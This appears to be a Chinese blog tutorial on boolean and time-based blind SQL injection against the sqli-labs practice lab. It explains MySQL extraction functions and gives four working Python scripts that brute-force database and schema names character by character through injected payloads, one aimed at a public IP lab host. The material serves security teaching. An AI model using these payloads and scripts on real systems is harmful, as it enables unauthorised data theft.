今日学习目标:
学习sql注入之盲注操作
✅创作者:贤鱼
⏰预计时间:25分钟
个人主页:贤鱼的个人主页
专栏系列:网络安全
存在sql注入漏洞的地方,但是不会会先数据,只能看到是否执行成功,这样子就不能通过注入数据回显了,就需要盲注,盲注对一个数据多次测试
举个例子
如果"库名"第一个字母是a,就回显“查询成功”,反之“查询失败”;
如果"库名"第一个字母是b,就回显“查询成功”,反之“查询失败”;
如果"库名"第一个字母是c,就回显“查询成功”,反之“查询失败”;
如果"库名"第一个字母是d,就回显“查询成功”,反之“查询失败”;
......
如果"库名"第一个字母是z,就回显“查询成功”,反之“查询失败”;
......
名字可能由任何字符组成,我们如果匹配上了,就把他记录下来,一位一位的比较,就可以获得我们要的数据了
当然,如果手动比较,电脑和我的手一定会炸掉一个
所以我们需要写脚本,在后文会介绍到。
确定注入点,找到回显不同,例如:内容不同或者http头部不同
我们该如何构造语句呢?
举个栗子
SELECT name, mojority FROM student WHERE student_id = '0' or substr((QUERY),1,1) = 'a'
SELECT name, mojority FROM student WHERE student_id = ‘0’ or substr((QUERY),1,1) = ‘a’
这个部分就是我们需要构造的部分
构造语句的两个重点:
字符串如何截取
比较结果是否相等
所以盲注就相当于把注入内容一位一位拆开然后比较内容,最后比较出啥输出啥,然后将比较到的每一位字符都输出就是我们的答案了
使用方法:
substr(要截取的字符串,从哪一位开始,截取多长)
例如
select substr((select database()),1,1);
用法和substr完全相同!!可以互相绕过过滤
使用方法
right(要截取的字符串,截取长度)
表示截取字符串右边几位
注意:
配合ascii/ord一起使用,这两个函数是返回传入字符串的首字母的ASCII码
使用方法:
ascii((right(要截取的字符串,x)))
返回的内容是从右往左x位的ascii码
举个栗子
select ascii(right((select database()), 2));
使用方法:
left(要截取的字符串,截取长度)
表示截取字符串左边第几位
注意:
配合reverse()+ascii/ord使用,用法和上面类似
举个栗子:
elect ascii(reverse(left((select database()), 2));
使用方法:
binary 目标字符串 regexp 正则
判断一个字符串是否匹配一个正则表达式
举个栗子:
select (select database()) regexp binary '^sec'
用法和regexp雷同
trim(leading ‘a’ from ‘abcd’)
表示移除句首a,会返回abc,如果将from前的a改成b,则会返回abcd
用法
insert(字符串,起始位置,长度,替换成什么)
INSTR(str,substr)–> 返回字符串 str 中子字符串的第一个出现位置,否则为0
FIND_IN_SET(str,strlist)–> 返回字符串 str 中子字符串的第一个出现位置,否则为0
LOCATE(substr,str,pos)–> 返回字符串 str中子字符串substr的第一个出现位置, 起始位置
在pos。如若substr 不在str中,则返回值为0
POSITION(substr IN str)–> 返回子串 substr 在字符串 str 中第一次出现的位置。如果子串
substr 在 str 中不存在,返回值为 0
用法: locate(substr, str, pos) 字符串 str中子字符串substr的第一个出现位置, 起始位置在
pos。如若substr 不在str中,则返回值为0。
我觉得不需要讲。。。
上文有讲,截取+比较结合体
用法
expr between 下界 and 上界
意思是是否expr>=下界 &&expr<=上界
用法
expr0 in(expr0,expr1,expr2)
可以用一个 true 去与运算一个ASCII码减去一个数字,如果返回0则说明减去的数字就是所判断的
ASCII码:
SELECT 1 AND ascii("a")-97;
可以用一个 false 去或运算一个ASCII码减去一个数字,如果返回0则说明减去的数字就是所判断的
ASCII码:
SELECT 0 OR ascii("a")-97;
import requests
req = requests.session()
chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz~!@#$%^&*
()-=_+`[]{}\\|;:\'",./<>?'
url = "http://47.94.236.172:18080/Less-8/"
result = ""
query = "database()"
payload = "-1' or ascii(substr(({query}),{pos},1))={c}#"
# payload = "1' and if(ascii(insert((insert({query}, 1,
{pos},'')),2,9999999,''))={c},1,0)#"
for i in range(1, 50):
for j in chars:
data = {'id': payload.format(query=query, pos=i, c=ord(j))}
resp = req.get(url, params=data) #GET:params=data POST:data=data
# print(resp.url)
# print(resp.text)
if "You are in" in resp.text:
result += j
print(result)
break
print('end...')
print(result)
这里还提供另一种方法:二分法
import requests
url = 'http://47.94.236.172:18080/Less-8/'
result = ''
query = "select group_concat(SCHEMA_name) from information_schema.schemata"
payload = "-1' or ascii(substr(({query}),{pos},1))>{c}#"
req = requests.session()
for x in range(1, 50):
high = 127
low = 32
mid = (low + high) // 2
while high > low:
data = {"id": payload.format(query=query, pos=x, c=mid)}
resp = requests.get(url, params=data) #GET:params=data POST:data=data
# print(resp.url)
if 'You are in' in resp.text: #
low = mid + 1
else:
high = mid
mid = (low + high) // 2
# print(mid)
result += chr(int(mid))
print(result)
print("end.......")
print(result)
有那么一种可能,查询成功失败返回的都一样,那么我们就无法通过返回结果看比较是否成功了,这时候就需要从裤裆里掏出时间盲注了!!!
介绍下原理:
如果"数据库名"的第1个字母是a,你就睡眠5秒,否则就直接回显
如果"数据库名"的第1个字母是b,你就睡眠5秒,否则就直接回显
......
如果"数据库名"的第2个字母是a,你就睡眠5秒,否则就直接回显
如果"数据库名"的第2个字母是b,你就睡眠5秒,否则就直接回显
如果"数据库名"的第2个字母是c,你就睡眠5秒,否则就直接回显
......
后面以此类推
和上文布尔盲注差不多,只不过在构造条件语句时关注延时操作而不是返回值了
往上翻,啥都有
补充一下
如果and前为真,执行后面内容
(condition) AND sleep(5)
如果前面为假才执行后面
!(condition) OR sleep(5)
这里还是要写一下
意思是休眠指定事件后继续
栗子:
SELECT if(ascii(substr((QUERY),8,1))=121,sleep(5),0);
用法
benchmark(执行次数,执行什么)
栗子:
SELECT benchmark(10000000,sha1('test'));
注意当查询发生在多个表中时,会将多个表已笛卡尔积的形式联合起来,在进行查询,非常费时;
SELECT count(*) FROM information_schema.columns A,
information_schema.columns B, information_schema.columns C;
原理:
通过费时正则匹配操作消耗时间
栗子:
select concat(rpad('a',3999999,'a'),rpad('a',3999999,'a')) RLIKE
concat(repeat('(a.*)+',30),'b');
期不期待
同样给到两个方法:
import requests
url = 'http://localhost/sqli-labs/Less-8/'
chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz~!@#$%^&*
()-=_+`[]{}\\|;:\'",./<>?'
query = "database()"
payload = "1' and if(ascii(substr(({query})),{pos},1))={c},sleep(10),0)#"
result = ''
req = requests.session()
for i in range(1, 50):
for j in chars:
data = {'id': payload.format(query=query, pos=i, c=ord(j))}
try:
resp = requests.get(url, params=data, timeout=5) #GET:params=dataPOST:data=data
print(resp.url)
except requests.Timeout:
result += j
print(result)
break
print('end...')
print(result)
二分法
import requests
url = 'http://47.94.236.172:18080/Less-9/'
result = ''
query = "database()"
payload = "1' and if(ascii(substr(({query}),{pos},1))>{c},sleep(10),0)#"
req = requests.session()
for x in range(1, 50):
high = 127
low = 32
mid = (low + high) // 2
while high > low:
data = {"id": payload.format(query=query, pos=x, c=mid)}
try:
resp = requests.get(url, params=data, timeout=5) #GET:params=data POST:data=data
print(resp.url)
except requests.Timeout:
low = mid + 1
mid = (low + high) // 2
# print(data)
continue
high = mid
mid = (low + high) // 2
# print(mid)
result += chr(int(mid))
print(result)
print("end.......")
print(result)
用法和延时盲注基本一致,但是可以用来绕过过滤延时盲注的关键字
原理就是比较条件为真时,通过调用产生错误的函数
if(condition,报错,不报错)
结束语
如果有需要可以订阅专栏,持续更新!
让我们下期再见!!